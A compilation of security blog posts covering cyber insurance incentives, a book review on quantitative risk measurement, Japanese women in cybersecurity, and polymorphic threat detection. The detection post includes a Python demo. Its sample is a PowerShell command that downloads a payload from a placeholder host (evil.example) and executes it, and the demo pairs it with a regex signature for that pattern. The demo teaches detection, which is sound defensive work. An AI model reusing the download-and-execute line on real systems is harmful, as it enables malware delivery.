Insurance Carrot Beats Government Stick in Quest for Stronger Cybersecurity

When it comes to cybersecurity, the U.S. federal government recognizes the carrot is more effective than the stick. Instead of using regulations to increase data security and protect personal information within private organizations, the White House is enlisting the insurance industry to offer incentives for adopting security best practices.

In March 2016, the U.S. House Homeland Security Cybersecurity Subcommittee held a hearing to explore possible market-driven cyber insurance incentives. The idea, said Rep. John Ratcliffe, chairman of the subcommittee, is to enable “all boats to rise, thereby advancing the security of the nation.”

The issue isn’t a lack of cyber insurance. Today, 80% of companies with more than 1,000 employees have a standalone cybersecurity policy, according to a Risk and Insurance Management Society survey. The real issue is getting companies to maintain more than a minimum set of security standards.

Borrowing from the fire insurance playbook
The insurance industry has been a catalyst for change in the past. Attendees of the Homeland Security Cybersecurity Subcommittee hearing pointed to the fire insurance market as a good example of using a carrot to drive positive behavior. Insurers offer lower rates to policyholders who adhere to certain fire safety standards, such as installing sprinklers and having extinguishers nearby.

Identifying best practices
So, what are the cybersecurity equivalents of sprinklers and fire alarms? Hearing attendees highlighted four components of an effective cyber risk culture:

  • Executive leadership: what boards of directors should do to build corporate cultures that manage cyber risk well.
  • Education and awareness: training and other mechanisms that are necessary to foster a culture of cybersecurity.
  • Technology: specific technologies that can improve cybersecurity protections.
  • Information sharing: ensuring the right people within the company have the information they need to enhance cybersecurity risk investments.

Spurring much-needed actuarial data
The hearing also touched on a major missing element in the current cyber insurance industry: reliable actuarial data regarding data breaches and other cyber incidents. Auto insurers know the likelihood of car accidents, so they know how to price the liability and measure the risk. But the likelihood and ramifications of various data breaches are a wildcard today, leading to problems in pricing cybersecurity policies.

Hearing attendees discussed creating an actuarial data repository with data from leading actuarial firms, forensic technology firms and individual insurer cyber claims. The proposed database would be housed at a nongovernmental location such as the Insurance Services Office Inc. (ISO), which has managed insurer actuarial databases for more than four decades. The hope is the database would encourage voluntary sharing of information about data breaches, business interruption events and cybersecurity controls to aid in risk mitigation.

While the cyber insurance carrot is a long way from becoming reality, at least the seed has been planted.

Laurie Kumerow, Consultant, Code42

[Cloud Security Alliance Blog]

The Cybersecurity Canon: How to Measure Anything in Cybersecurity Risk

We modeled the Cybersecurity Canon after the Baseball or Rock & Roll Hall-of-Fame, except for cybersecurity books. We have more than 25 books on the initial candidate list, but we are soliciting help from the cybersecurity community to increase the number to be much more than that. Please write a review and nominate your favorite. 

The Cybersecurity Canon is a real thing for our community. We have designed it so that you can directly participate in the process. Please do so!

Book Review by Canon Committee Member, Steve Winterfeld: How to Measure Anything in Cybersecurity Risk (2016) by Douglas W. Hubbard and Richard Seiersen

Executive Summary

How to Measure Anything in Cybersecurity Risk is a book that reads like a college statistics textbook (but the good kind you highlight a lot). It is a book anyone who is responsible for measuring risk, developing metrics, or determining return on investment should read. It is grounded in classic quantitative analysis methodologies and provides a good balance of background and practical examples. This book belongs in the Cybersecurity Canon under Governance Risk and Compliance (GRC).

Review

As I said, this book reads like an education in quantitative modeling and how to apply the methodology to cybersecurity. It directly challenges the common practice of building risk frameworks on expert opinion and ordinal scoring. Here is a snippet from the book:

“So let’s be clear about our position on current methods: They are a failure. They do not work. A thorough investigation of the research on these methods and decision-making methods in general indicates the following: There is no evidence that the types of scoring and risk matrix methods widely used in cybersecurity improve judgment. On the contrary, there is evidence these methods add noise and error to the judgment process. Any appearance of “working” is probably a type of “analysis placebo.” That is, a method may make you feel better even though the activity provides no measurable improvement in estimating risks (or even adds error). There is overwhelming evidence in published research that quantitative, probabilistic methods are effective. Fortunately, most cybersecurity experts seem willing and able to adopt better quantitative solutions. But common misconceptions held by some—including misconceptions about basic statistics—create some obstacles for adopting better methods. How cybersecurity assesses risk, and how it determines how much it reduces risk, are the basis for determining where cybersecurity needs to prioritize the use of resources. And if this method is broken—or even just leaves room for significant improvement—then that is the highest-priority problem for cybersecurity to tackle!”

The authors lay out the book in three sections:

  • Part I sets the stage for reasoning about uncertainty in security. It outlines terms on things like security, uncertainty, measurement and risk management. Plus, it argues against toxic misunderstandings of these terms and why we need a better approach to measuring cybersecurity risk and, for that matter, measuring the performance of cybersecurity risk analysis itself. Finally, it introduces a simple quantitative method that could serve as a starting point for anyone, no matter how averse the person may be to complexity.
  • Part II delves further into evolutionary steps we can take with a simple quantitative model. It explains how to add further complexity to a model and how to use even minimal amounts of data to improve those models.
  • Part III describes what is needed to implement these methods in the organization. It addresses the implications of this book for the entire cybersecurity “ecosystem,” including standards organizations and vendors.

The cybersecurity community suffers from not having standard evaluation metrics of the kind finance has in earnings before interest, taxes, depreciation and amortization (EBITDA). The authors try to bring some discipline to terms by offering standard definitions drawn from the quantitative analytics field. From the book:

  • Definitions for Uncertainty and Risk, and Their Measurements:
  • Uncertainty: The lack of complete certainty, that is, the existence of more than one possibility. The “true” outcome/state/result/value is not known.
  • Measurement of Uncertainty: A set of probabilities assigned to a set of possibilities. For example: “There is a 20% chance we will have a data breach sometime in the next five years.”
  • Risk: A state of uncertainty where some of the possibilities involve a loss, catastrophe, or other undesirable outcome.
  • Measurement of Risk: A set of possibilities, each with quantified probabilities and quantified losses. For example: “We believe there is a 10% chance that a data breach will result in a legal liability exceeding $10 million.”

They also walk the reader through established methodologies such as Monte Carlo simulation, Bayesian interpretation, the risk matrix, the loss exceedance curve, heat maps, the chain rule tree, beta distribution updates, regression model predictions, the analytics maturity model, power law distributions, subjective probability, calibration, dimensional modeling, expected opportunity loss, “bunch of guys sitting around talking” (BOGSAT), expected value of perfect information, and the NIST and ISO frameworks. They show how to do each in Excel, so the material is truly practical. They also lay out survey results on attitudes toward quantitative methods, the global information security workforce study, and statistics literacy and acceptance studies.

This book follows earlier work such as Factor Analysis of Information Risk (FAIR), a well-recognized value at risk (VaR) framework, and the Monte Carlo–based methodology and tools developed by Jack Jones and Jack Freund. Another related work is The Wisdom of Crowds by James Surowiecki.

Finally the book has some great online resources. You can find eight sample downloads of the methods explained, as well as webinar/blog info.

Conclusion

How to Measure Anything in Cybersecurity Risk is an extension of Hubbard’s successful first book, How to Measure Anything: Finding the Value of “Intangibles” in Business. It lays out why statistical models beat unaided expert judgment. It is a book anyone who is responsible for measuring risk, developing metrics, or determining return on investment should read. It provides a strong foundation in quantitative analytics with practical application guidance.

Bottom line: The authors lay out a solid case for how other industries that face similar challenges, namely a lack of quantifiable, standardized or historical actuarial-table-like data, are still able to use classic statistical modeling and methodologies to measure risk in a quantified, repeatable way. Definitely worth considering.

[Palo Alto Networks Research Center]

Calling All Women in Technology: Japan’s Cybersecurity Field Needs You

This post originally appeared on Context: By New America

Where were all the Japanese women?

I was asking myself that question while participating in the Grace Hopper Celebration of Women in Computing conference last month, one of the largest global conferences for women in IT.

At the conference, I spoke with dozens of female college students majoring in computer science and cybersecurity in the United States. About half of the women I spoke with were American students, while the other half were students from India and China who were studying in the U.S. and ultimately hoped to stay and work in cybersecurity after graduation. But during my time at the conference I found myself asking, where were the women from my home country, Japan?

At the 2016 Grace Hopper Conference.

Seven years ago, I moved from Japan to the U.S. to pursue my graduate degree in international relations and economics at Johns Hopkins University and later conducted research on Japan–U.S. cybersecurity cooperation as a Fulbright scholar. I’ve also worked at the Japanese Ministry of Defense, a U.S. think tank that specializes in international security, and at Japanese and American tech companies. During this time, I’ve met few Japanese women working in the cybersecurity and tech industries overseas.

I began to investigate why and found a few factors that may explain why more Japanese women aren’t pursuing cyber jobs. It’s important now, more than ever, for women to enter this field.

First, some demographic context: The number of Japanese students matriculating in overseas universities and graduate programs has continued to decrease since 2004. This could be partly attributed to the decline in the number of children born in Japan since the 1980s. On the other hand, some observers, such as Aoyama Gakuin University Professor Kazuo Ogoura, have questioned whether the Japanese have become more introverted as Japan’s economic prosperity and affluence has grown, and thus are less inspired to seek new frontiers overseas.

This demographic reality is compounded by a gendered one: a smaller percentage of Japanese girls report that they want to pursue professional careers in engineering and computing than the global average, according to an OECD survey report in 2012. While the global average is approximately five percent, the figure is about three percent in Japan and the U.S. By comparison, the global average of boys who want to pursue careers in engineering and computing is 18 percent. Broken out, that figure is 15 percent in Japan and 17 percent in the U.S.

One survey report by the Japanese Ministry of Education in March 2015 found that 9.1 percent of Japanese male college students work in the Information and Communications Technology (ICT) field, compared with just 6 percent of Japanese female students. This is despite the fact that a noticeably higher share of female students (44.9 percent) than male students (40.0 percent) pursue a bachelor’s degree in Japan. It indicates that fewer female students in Japan are choosing to pursue a career in tech.

Perhaps this is why I rarely see Japanese men or women (particularly the latter) at international cybersecurity conferences outside of Japan, particularly in the U.S., U.K. and France. There are also practical and cultural reasons for this: It is often challenging for non-native English speakers to draft proposals and deliver complex technical or international security conference presentations in a language other than their own. Additionally, Japanese culture traditionally discourages people from speaking up in a meeting to challenge a different opinion or idea because it disrupts group harmony, a priority in Japanese culture. Based on my own experience, the pressure of this tradition is even greater for women.

This lack of visibility is problematic because Japan is losing out on opportunities to provide and learn from different perspectives in global cybersecurity discussions. And it needs to be part of this global dialogue more than ever. That’s because Japan is hosting the Tokyo Summer Olympic Games in 2020, which prompted the government to publish the Japanese Cybersecurity Strategy in 2015, a three-year vision for securing Japan and preparing for Tokyo 2020. One of its key arguments is that top-notch cybersecurity professionals need to be global and should play an active role beyond national borders, since cybersecurity is a global challenge. As of 2014, Japan had approximately 265,000 information security professionals (160,000 of whom reportedly need more training) and a shortfall of roughly 80,000 professionals.

Like the rest of the world, Japan’s cybersecurity workforce shortfall is one that could hurt the country’s security in the long term. The Japanese government is well aware of the risk and finding ways to address the challenge.

That’s one reason why Japan’s efforts to cultivate a larger and global cybersecurity workforce will soon need to include diversity discussions like those happening in the U.S., determining how to recruit and retain groups that have been underrepresented in the cybersecurity workforce — like women. This is a place where Japan could be a global leader, if the private and public sectors make some of the necessary changes together, learning from the best practices of other nations and creating some of their own.

Still, it will be tough to remove some of the obstacles that are holding back women (and men) from the global cybersecurity workforce, and it won’t happen overnight. Japanese cybersecurity professionals will still face a language barrier and encounter cultural differences when joining international cybersecurity discussions and conferences. But joining in these discussions will ultimately help Japan, and the world, become more secure.

It can be scary to some women — particularly Japanese women — to be the minority in a conference room. It might require courage to speak up at a meeting. But as cybersecurity challenges grow increasingly complex and global, these perspectives representing different cultures and backgrounds will become even more important and valuable to the discussion. Think of yourself as an ambassador, paving the way and bridging the gap for other people from your community, country or culture. And you’re not alone; I will do my part and look forward to seeing you at future conferences, or hopefully, as a colleague.

[Palo Alto Networks Research Center]

What Are Unknown Cyber Threats? (And Are They Really Unknown?)

Most traditional security products are built to act based on known threats. The moment they see something that is known to be malicious, they block it. To get past security products that successfully block known threats, attackers are forced to create something that is previously unknown. How do they do it, and what can we do to prevent both known and unknown threats?

Let’s look at a few scenarios:

Recycle the Threat

Recycled threats are considered the most cost-effective attack method, which is why attackers often reuse existing threats and previously proven techniques. What makes these recycled threats somewhat “unknown” is the limited memory of security products. Every security product holds a finite set of protections, and security teams choose the most up-to-date threats to protect against, hoping to block the majority of incoming attacks. If an old threat no longer tracked by the security product attempts to enter the network, it can bypass the product because it is no longer recognized as something seen before.

To protect against these “unknown” recycled threats, it is critical to have access to a threat intelligence store with a much longer memory than the enforcement point itself, these days often placed in an elastic cloud infrastructure capable of scaling to the volume of threat data. If a security product does not have a particular threat identified and stored locally, a lookup against that larger knowledge base can determine whether the object is malicious and allow the security product to block it.

Modify Existing Code

This method is somewhat more expensive than recycling threats. Attackers take an existing threat and make slight modifications to its code, either manually or automatically, sometimes on every delivery as the threat moves through the network. The result is polymorphic malware or a polymorphic URL: each copy differs from the last even though the behavior is the same. If a security product identifies the original threat as known and creates a protection based on that one variation only, any slight change to the code turns the threat back into an unknown. Many security products match threats using cryptographic hashes, which map a file’s bytes to a fixed-length value in such a way that it is extremely unlikely that different content will produce the same hash value. In our context, the hash value matches exactly one variation of the threat, so any new variation, even one that differs by a single byte, is treated as new and unknown.

To better protect against these threats, security products need to use smart signatures. Smart signatures are based on the content and patterns of traffic and files rather than on a hash of the whole object, and can identify and protect against modifications and variations of a known threat. Focusing on what the code does and the patterns it must contain, rather than on one fixed encoding of it, allows detection of modified malware that a hash would miss.
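The difference between exact-hash matching and a content-pattern signature is easiest to see by mutating a sample and running both detectors over it. The following Python is an added example written for this page, not code from the original article or from any vendor’s detection engine: the “malware” is a constructed byte string standing in for a download-and-execute script, the `mutate` function is a deliberately simple stand-in for a polymorphic packer (it renames variables, swaps the hostname and changes whitespace), and `PATTERN_SIGNATURE` is an illustrative regular expression, not a production signature.

```python
"""Exact-hash blocklist vs. content-pattern signature against polymorphic variants.

Added example, not from the original article. Sample, mutation and signature are
constructed for illustration only.
"""
import hashlib
import re

# Constructed sample: a stand-in for a malicious download-and-execute script.
ORIGINAL_SAMPLE = (
    b"$u='http://evil.example/payload.bin';"
    b"$f=\"$env:TEMP\\svchost.exe\";"
    b"(New-Object Net.WebClient).DownloadFile($u,$f);"
    b"Start-Process $f"
)


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the full object, the kind of value a hash blocklist stores."""
    return hashlib.sha256(data).hexdigest()


# Hash-based protection: one entry per exact byte sequence ever seen.
HASH_BLOCKLIST = {sha256_hex(ORIGINAL_SAMPLE)}


def hash_detect(sample: bytes) -> bool:
    """True only if the sample is byte-for-byte identical to a known-bad object."""
    return sha256_hex(sample) in HASH_BLOCKLIST


# Content-pattern ("smart") signature: the download-then-execute sequence, with
# wildcards for the variable names, whitespace and URL that a packer changes.
PATTERN_SIGNATURE = re.compile(
    rb"New-Object\s+Net\.WebClient\)\s*\.DownloadFile\(.*?\)\s*;.*?Start-Process",
    re.IGNORECASE | re.DOTALL,
)


def pattern_detect(sample: bytes) -> bool:
    """True if the sample contains the behavioral pattern, regardless of exact bytes."""
    return PATTERN_SIGNATURE.search(sample) is not None


def mutate(sample: bytes, seed: int) -> bytes:
    """Toy polymorphic transform (assumption, not a real packer): rename the two
    variables, change the hostname and alter whitespace. Behavior is unchanged."""
    variant = sample.replace(b"$u", b"$v%d" % seed).replace(b"$f", b"$p%d" % seed)
    variant = variant.replace(b"evil.example", b"cdn%d.example" % seed)
    variant = variant.replace(b";", b"; ")  # whitespace alone is enough to defeat a hash
    return variant


def evaluate(samples: dict) -> dict:
    """Return {name: (hash_hit, pattern_hit)} for each labelled sample."""
    return {name: (hash_detect(s), pattern_detect(s)) for name, s in samples.items()}


# Constructed test set: the original, two variants and a benign script.
SAMPLES = {
    "original": ORIGINAL_SAMPLE,
    "variant_1": mutate(ORIGINAL_SAMPLE, 1),
    "variant_2": mutate(ORIGINAL_SAMPLE, 2),
    "benign": b"Get-ChildItem $env:TEMP | Sort-Object Length",
}

if __name__ == "__main__":
    for name, (h, p) in evaluate(SAMPLES).items():
        print(f"{name:10s} hash_match={h!s:5s} pattern_match={p!s:5s}")
```

Run as a script, only the original sample trips the hash blocklist, while both variants still trip the pattern signature and the benign script trips neither. The caveat a practitioner should keep in mind is that a pattern signature is only as good as the invariant it keys on: an attacker who base64-encodes the script or builds the `DownloadFile` call from string fragments evades this one too, and a pattern written too loosely starts matching legitimate administration scripts. Smart signatures raise the attacker’s cost; they do not end the arms race.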

Create a New Threat

Attackers who are more determined and willing to invest the money will create an entirely new threat with purely new code. All aspects of the cyber attack lifecycle have to be new for an attack to truly be considered a previously unknown threat.

Focus on Business Behavior

Protecting against these new threats requires focusing on your organization’s unique business behavior and data flows, and turning that knowledge into enforceable policy. As an example, segmenting the network into zones and writing policy in terms of user identity and application identity, rather than IP addresses and ports alone, can keep a new threat from spreading laterally across the organization, and blocking downloads from new, unknown and unclassified websites removes a common delivery path.

Utilize Collective Intelligence

No single organization will ever be the first to experience every new threat globally, which is why it is so important to benefit from collective threat intelligence. Targeted attacks with unknown, never-before-seen threats can quickly become known through global information sharing. When a new threat is analyzed and detected in one organization, the newly identified threat information can be distributed across the community, with mitigations deployed ahead of time to limit the spread of attacks and their effectiveness globally.

Turning unknown threats into known ones and actively preventing them requires two capabilities working together. First, you need to predict the attacker’s next step and where it will land. Second, you need to develop and deliver a protection to that enforcement point quickly enough to stop it.

Automate Protections

When a truly new threat enters your organization, the first line of defense is a set of cybersecurity best practices that are specific to the organization. At the same time, you should be sending unknown files and links for analysis. The effectiveness of sandbox analysis depends on the time it takes to reach an accurate verdict on an unknown threat and the time needed to create and deploy protections across the organization. Your security posture needs to change fast enough to block the threat before it can progress, in other words, as soon as possible. And to ensure that the threat does not traverse the network further, preventions need to be created and deployed automatically across all security products faster than the threat can productively spread.

A recent SANS survey reported that 40 percent of attacks have previously unknown elements. The ability to detect unknown threats and prevent successful attacks defines the effectiveness of your security deployment. A true next-generation security platform is agile, quickly turning unknown threats into known protection and prevention on a global level, automatically sharing new threat data and extending new protections throughout the organization to stop the spread of an attack. Learn more about the Palo Alto Networks Next-Generation Security Platform.

[Palo Alto Networks Research Center]
